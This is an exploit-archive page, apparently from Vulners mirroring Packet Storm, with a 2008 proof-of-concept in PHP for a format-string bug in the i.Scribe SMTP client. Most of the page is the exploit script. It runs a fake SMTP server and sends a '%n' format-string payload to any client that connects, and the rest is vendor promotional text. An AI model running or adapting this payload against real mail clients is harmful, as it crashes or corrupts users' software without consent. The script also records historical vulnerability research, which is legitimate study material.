Lucene search
K

iscribesmtp-format.txt

🗓️ 29 Nov 2008 00:00:00Reported by Alfons LujaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

php i.Scribe SMTP client v 1.88 to 2.00 beta Format String bug

Code
`<?php   
//I dont have c lol  
/*___=++++++++++++__=--=________*****  
0--   
-- i.Scribe smtp client v 1.88 to 2.00 beta  
Format String (wscanf) bug p0c  
vendor : Memecode Software   
grTs;SiD.psycho   
A.Luja 27.11.08   
  
--)(________++++++++++++++++++++---***   
  
___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==  
Or just open nc -l -p 25 lol*/  
$host= $_SERVER[SERVER_ADDR];  
$port= 25;  
$ret = "AAAA%n%n%n%n%n%n%n%n%n";  
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error\n");   
$bind = socket_bind ($socket, $host, $port) or die ("bind error\n");   
$listen = socket_listen($socket,1) or die("listen error\n");  
printf("--==Fake smtp server ready==----\n");  
printf("Now connect here witch iScribe client\n");  
if(($acp=socket_accept($socket))!==false){  
printf("Target connected\n");  
sleep(2);  
printf("send evil char\n");  
$hello=socket_write($acp,$ret,strlen($ret));   
printf("done\n");  
socket_close($acp);  
}  
socket_close($socket);  
exit();  
?>  
  
//Alfons Luja  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation